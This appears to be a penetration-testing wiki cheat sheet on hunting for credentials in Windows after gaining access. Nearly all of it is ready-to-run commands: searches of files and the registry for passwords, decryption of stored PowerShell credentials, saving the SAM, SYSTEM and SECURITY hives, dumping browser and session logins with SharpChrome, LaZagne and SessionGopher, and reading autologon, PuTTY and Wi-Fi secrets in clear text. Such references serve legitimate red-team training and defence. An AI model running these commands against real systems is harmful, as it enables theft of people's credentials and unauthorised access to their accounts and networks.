Credential Hunting

Search for Passwords

findstr /si password *.xml *.ini *.txt
dir .s *pass* == *.config
dir /s *pass* == *cred* == *vnc* == *.config*

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\Users\<USERNAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.vbs -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path "C:\Users\<USERNAME>" -Recurse -Include *.txt,*.xml,*.ini,*.conf -File -ErrorAction SilentlyContinue | Select-String -Pattern "password|passwd|pass|name|login|user|username"

Saved Credentials

cmdkey /list

Run Commands as Another User

runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Application Configuration Files

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

Dictionary Files

Chrome Dictionary Files

gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Unattended Installation Files

Unattended installation files may define auto-logon settings or additional accounts to be created as part of the installation. Passwords in the unattend.xml are stored in plaintext or base64 encoded.

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

PowerShell History File

Confirming PowerShell History Save Path

Get-History
(Get-PSReadLineOption).HistorySavePath

Reading PowerShell History File

gc (Get-PSReadLineOption).HistorySavePath

We can also use this one-liner to retrieve the contents of all Powershell history files that we can access as our current user.

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

PowerShell Credentials

PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently.

Take, for example, the following script Connect-VC.ps1, which a sysadmin has created to connect to a vCenter server easily.

# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

Decrypting PowerShell Credentials

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

PSCredential Object

$password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred

Local Administrator Password Solution (LAPS)

Get-ADComputer <RHOST> -property 'ms-mcs-admpwd'

Search the Registry for Passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Dumping Credentials

reg save hklm\system system
reg save hklm\sam sam
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

Other files

Manually Searching the File System for Credentials

# Search File Contents for String
cd c:\Users\user\Documents & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

-- Powershell ----------------------------
select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password

# Search for file extensions
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config

-- Powershell ----------------------------
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Sticky Notes Passwords

Looking for StickyNotes DB Files

C:\Users<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

This can also be done with PowerShell using the PSSQLite module.

Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PSSQLite.psd1

$db = 'C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Internet Information Service (IIS)

C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

## Other Files of Interest

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*

Further Credential Theft

Browser Credentials

We can use a tool such as SharpChrome to retrieve cookies and saved logins from Google Chrome.

.\SharpChrome.exe logins /unprotect

Lazagne

When all else fails, we can run the LaZagne tool in an attempt to retrieve credentials from a wide variety of software.

.\lazagne.exe all

SessionSopher

We can use SessionGopher to extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials.

We need local admin access to retrieve stored session information for every user in HKEY_USERS, but it is always worth running as our current user to see if we can find any useful credentials.

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01

Windows Autologon

Windows Autologon is a feature that allows a user to configure their Windows operating system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup.

The registry keys associated with Autologon can be found under HKEY_LOCAL_MACHINE in the following hive, and can be accessed by standard users:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

The typical configuration of an Autologon account involves the manual setting of the following registry keys:

AdminAutoLogon - Determines whether Autologon is enabled or disabled. A value of "1" means it is enabled.
DefaultUserName - Holds the value of the username of the account that will automatically log on.
DefaultPassword - Holds the value of the password for the user account specified previously.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Putty

For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text.

Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>

Enumerating Sessions and Finding Credentials

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

Wifi Passwords

If we obtain local admin access to a user's workstation with a wireless card, we can list out any wireless networks they have recently connected to.

netsh wlan show profile

Retrieving Saved Wireless Passwords

netsh wlan show profile ilfreight_corp key=clear

PreviousWindows Vulnerabilities NextTools

Last updated 12 days ago